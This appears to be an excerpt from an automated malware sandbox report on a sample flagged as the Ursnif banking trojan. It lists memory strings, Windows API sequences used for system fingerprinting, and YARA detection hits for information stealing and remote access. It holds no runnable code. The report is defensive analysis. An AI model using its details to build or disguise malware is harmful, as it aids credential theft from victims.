Source: loaddll32.exe, 00000000.00000002.476069829.0000000001940000.00000002.00000001.sdmp, powershell.exe, 00000015.00000002.506371635.0000024483D40000.00000002.00000001.sdmp, powershell.exe, 0000001A.00000002.522399282.000001DB074B0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: loaddll32.exe, 00000000.00000002.476069829.0000000001940000.00000002.00000001.sdmp, powershell.exe, 00000015.00000002.506371635.0000024483D40000.00000002.00000001.sdmp, powershell.exe, 0000001A.00000002.522399282.000001DB074B0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.476069829.0000000001940000.00000002.00000001.sdmp, powershell.exe, 00000015.00000002.506371635.0000024483D40000.00000002.00000001.sdmp, powershell.exe, 0000001A.00000002.522399282.000001DB074B0000.00000002.00000001.sdmp Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.476069829.0000000001940000.00000002.00000001.sdmp, powershell.exe, 00000015.00000002.506371635.0000024483D40000.00000002.00000001.sdmp, powershell.exe, 0000001A.00000002.522399282.000001DB074B0000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0485FF06 cpuid 0_2_0485FF06
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA, 0_2_6E231813
Queries the installation date of Windows
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0484C420 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError, 0_2_0484C420
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E231983 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 0_2_6E231983
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04854D10 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 0_2_04854D10
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E231262 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 0_2_6E231262
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match File source: 00000003.00000003.348342609.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.373389445.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370586120.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.435306000.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370648596.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.454676310.0000018F0052C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000002.524027105.0000018F0052C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.348321035.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370736273.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.454577691.0000018F0052C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370774075.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.348246192.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.354947926.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370705290.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.357289358.0000000004E8C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.379171921.0000000003CBC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.409791915.0000000005858000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.348360798.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.348388126.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.352157676.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.377531681.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.348375110.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.348299510.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370678028.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.454500473.0000018F0052C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.348273789.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.454723611.0000018F0052C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370795651.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370752260.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 4156, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5928, type: MEMORYSTR

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match File source: same memory dumps and process memory spaces as listed under Stealing of Sensitive Information above (loaddll32.exe PID: 4156, rundll32.exe PID: 5928)